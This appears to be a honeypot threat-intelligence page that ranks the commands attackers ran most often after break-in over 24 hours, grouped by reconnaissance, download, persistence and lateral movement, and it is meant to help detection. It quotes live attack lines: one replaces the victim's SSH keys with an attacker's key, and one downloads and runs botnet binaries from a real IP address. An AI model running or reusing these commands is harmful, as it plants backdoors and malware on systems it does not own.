Executed Commands

Real-time analysis of the commands attackers execute most often after gaining system access. Data is collected from our global honeypot network over the last 24 hours.

7,810 commands in 24h

Top Executed Commands

1.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
139 IPs, 366x
2.
$lockr -ia .ssh
139 IPs, 366x
3.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
138 IPs, 366x
4.
$cat /proc/cpuinfo | grep name | wc -l
126 IPs, 321x
5.
$uname -a
132 IPs, 320x
6.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
129 IPs, 319x
7.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
126 IPs, 318x
8.
$lscpu | grep Model
129 IPs, 318x
9.
$uname
128 IPs, 317x
10.
$top
127 IPs, 316x
11.
$whoami
128 IPs, 316x
12.
$ls -lh $(which ls)
126 IPs, 315x
13.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
126 IPs, 315x
14.
$which ls
126 IPs, 315x
15.
$crontab -l
125 IPs, 313x
16.
$uname -m
126 IPs, 312x
17.
$cat /proc/cpuinfo | grep model | grep name | wc -l
126 IPs, 312x
18.
$w
125 IPs, 310x
19.
$Enter new UNIX password:
109 IPs, 210x
20.
$Enter new UNIX password:
109 IPs, 210x
21.
$cat /proc/uptime 2 > /dev/null | cut -d. -f1
31 IPs, 142x
22.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
78 IPs, 111x
23.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version
45 IPs, 103x
24.
$uname -s -v -n -m 2 > /dev/null
45 IPs, 103x
25.
$uname -s -v -n -r -m
21 IPs, 96x
26.
$uname -m 2 > /dev/null
31 IPs, 71x
27.
$/bin/./uname -s -v -n -r -m
13 IPs, 55x
28.
$echo SCANNER_TEST
34 IPs, 40x
29.
$cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.uhavenobotsxd; curl http://94.154.35.154/arm.uhavenobotsxd -O; chmod +x arm.uhavenobotsxd; ./arm.uhavenobotsxd android; busybox wget http://94.154.35.154/arm5.uhavenobotsxd; curl http://94.154.35.154/arm5.uhavenobotsxd -O; chmod +x arm5.uhavenobotsxd; ./arm5.uhavenobotsxd android; busybox wget http://94.154.35.154/arm6.uhavenobotsxd; curl http://94.154.35.154/arm6.uhavenobotsxd -O; chmod +x arm6.uhavenobotsxd; ./arm6.uhavenobotsxd
1 IP, 31x
30.
$shell
7 IPs, 14x

Reconnaissance

Commands to gather system information (uname, whoami, cat /etc/passwd)

Download

Commands to download malware (wget, curl, tftp)

Persistence

Commands to maintain access (crontab, chmod, chattr)

Lateral Movement

Commands to spread across the network (ssh, scp, ping)

About this data

These commands are captured in real-time when attackers gain access to our honeypots. They represent actual techniques used in automated and manual attacks. Use this information to improve your threat detection and incident response.